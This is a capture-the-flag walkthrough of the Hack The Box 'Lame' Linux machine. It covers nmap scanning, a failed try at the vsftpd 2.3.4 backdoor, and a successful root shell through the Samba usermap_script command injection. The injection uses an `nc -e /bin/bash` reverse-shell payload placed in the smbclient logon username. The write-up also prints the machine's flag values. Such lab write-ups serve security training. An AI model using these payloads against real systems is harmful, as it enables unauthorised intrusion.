This is an easy linux box
Tool used
- find
- nc
- nmap
- python
- searchsploit
- smbclient
Reconnaissance
Nmap
nmap -sV -sC -oA lame 10.10.10.3 -Pn -v
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h06m30s, deviation: 2h49m44s, median: 6m28s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2020-07-15T06:12:45-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Here’s what nmap teaches us :
- port 21 (FTP) vsftpd 2.3.4 : anonymous login
- port 22 (SSH) OpenSSH 4.7p1
- port 139 (NETBIOS) Samba smbd 3.X - 4.X
- port 445 (SMB) Samba smbd 3.0.20-Debian
We have some version, let’s check for known exploits.
Searchsploit
FTP
I download the metasploit exploit like so :
searchsploit -m unix/remote/17491.rb
Looking at the exploit, we see that the backdoor payload is initiated in response to a :) character combination in the username which represents a smiley face. The code sets up a bind shell listener on port 6200.
Let’s try it manually :
We triggered the backdoor, by using a smiley after the username.
ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:liodeus): test:)
331 Please specify the password.
Password:
Then we connect to the bind shell on port 6200.
nc 10.10.10.3 6200
id
whoami
But we got nothing, too bad, the FTP server must be patch !
SSH
As we can see, there is some exploit to do some “Username Enumeration”. It might be interresting, but at the moment I don’t really need a username. So if don’t find anything with SMB, I’ll get back to that exploit.
SMB
I see a “Command Execution”, let’s look at it.
Exploit
Download the metasploit exploit :
searchsploit -m unix/remote/16320.rb
The interresting part is here :
username = "/=`nohup " + payload.encoded + "`"
By specifying a username containing shell meta characters, attackers can execute arbitrary commands.(https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script)
I want a reverse shell so my payload should look something like this :
./=`nohup nc -e /bin/bash 10.10.14.4 1234`
Let’s try it !
Open a nc listener :
nc -lvp 1234
Then triggered the exploit.
smbclient //10.10.10.3/tmp --option='client min protocol=NT1'
Enter WORKGROUP\liodeus's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "./=`nohup nc -e /bin/bash 10.10.14.4 1234`"
Password:
We have a connection back to our listener and we are “root”, nice !
nc -lvp 1234
listening on [any] 1234 ...
10.10.10.3: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.3] 38077
id
uid=0(root) gid=0(root)
whoami
root
Shell upgrade
Now that we have a shell, let’s upgrade it :
which python
/usr/bin/python
python -c "import pty;pty.spawn('/bin/bash')"
root@lame:/#
And now go read the flags !
Flags
User.txt
find /home -name "user.txt"
/home/makis/user.txt
cat /home/makis/user.txt
69454a937d94f5f0225ea00acd2e84c5
Root.txt
find /root -name "root.txt"
/root/root.txt
cat /root/root.txt
92caac3be140ef409e45721348a4e9df